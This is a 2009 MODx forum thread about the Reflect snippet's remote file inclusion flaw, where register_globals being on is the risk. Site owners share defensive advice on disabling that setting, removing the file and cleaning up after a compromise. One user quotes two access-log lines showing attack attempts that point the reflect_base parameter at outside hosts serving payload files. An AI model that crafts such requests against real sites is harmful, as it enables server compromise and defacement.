0.9.6.2 security problem with reflect snippets

Quote from: rthrash at Apr 03, 2009, 11:57 PM

How does treating files as PHP5 solve the register globals being on issue?

Some hosts offer PHP4 with register_globals on by default and PHP5 with register_globals off by default, but that’s not a universal situation.

I am running MODx 0.9.6.3. In both CPanel and PHPInfo(), Register Globals is OFF (the server is running PHP 5.2.6). There is no snippet.reflect.php file in /assets/snippets/reflect/snippet.reflect.php ... I am assuming this is because it was removed from the download version back in November according to the Security Notice, whereas I only downloaded within the past few weeks.

Or rather, I am *hoping* this is the case. From reading this thread and the Security Notice, my understanding is that as long as Register Globals is off, and there is no file called snippet.reflect.php, then I am okay? Because I have seen a lot of activity like this in logs today:

//snippet.reflect.php?reflect_base=http://almanachtur.ru/images/crutz.txt?????
/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://64.13.230.27/logs/tst.txt??

I am not sure what the info in the log means. Are these just attempts, or do these entries mean someone’s actually managed to hack the site?

I guess my main concern is that the Secunia advisory mentions possible username input exploits and SQL injections as well as the problem with the "reflect_base" parameter. The way the advisory reads, only the "reflect_base" parameter exploit is cured by Register Globals being set to OFF. My paranoid mind is wondering about the username and SQL injections as well.

Thanks in advance for any light shed.

The Secunia reports are *very* out of date. If register globals is off you should be fine.

Quote from: BobRay at Apr 08, 2009, 01:16 AM

The Secunia reports are *very* out of date. If register globals is off you should be fine.

That is a relief - thank you, BobRay!

You will probably also notice that the log entries for those attempts don’t show the response as 200 (OK), since you’ve deleted the snippet text file (although if you hadn’t deleted that file they would show 200 responses and you’d still be safe from this vulnerability because register_globals is off).

Quote from: ZAP at Apr 09, 2009, 02:54 AM

You will probably also notice that the log entries for those attempts don’t show the response as 200 (OK), since you’ve deleted the snippet text file (although if you hadn’t deleted that file they would show 200 responses and you’d still be safe from this vulnerability because register_globals is off).

Zap, thank you for this. You’re right... they don’t show it as 200. : whew :

I have a new install (less than a month old) and as I’m learning how to work with MODx, someone got in through what I think was this exploit and added links in a hidden iframe on my testing site. I can’t even figure out what all they changed, so I think I need to reinstall.

I’ve read through this thread, but I haven’t been able to confirm 100% that this is what caused the problem. I’m running 0.9.6.3, and my big concern is that my site wasn’t even public, it was in a subdirectory of my site, and hardly ever enabled except when I was working on it and trying to learn this system. Is a big hole like this a common thing?

Thanks for any help or direction you can give, I appreciate it. I’d really like to stick with this for my development platform, but this is a huge setback.

Any number of vectors could have been in play here. What does your main site run? Does your site have register_globals enabled?

Register_globals was enabled on my host, I disabled it this morning after reading the posts here.

My site runs on LAMP, my hosting provider is Hostmysite.com. I’m currently digging through the logs to see if there are any other clues I can find. Luckilly it wasn’t a live site yet at least, but still, it’s a pain.

If the (reflect file + register_globals on) vulnerability was the way that they got access to your system, then they could have overwritten files on your server. If you’re not finding where the hidden iframe is being added to your pages, check index.php and also your site cache files. You should probably reupload all files with clean local backups and change your MODx and MySQL passwords right away.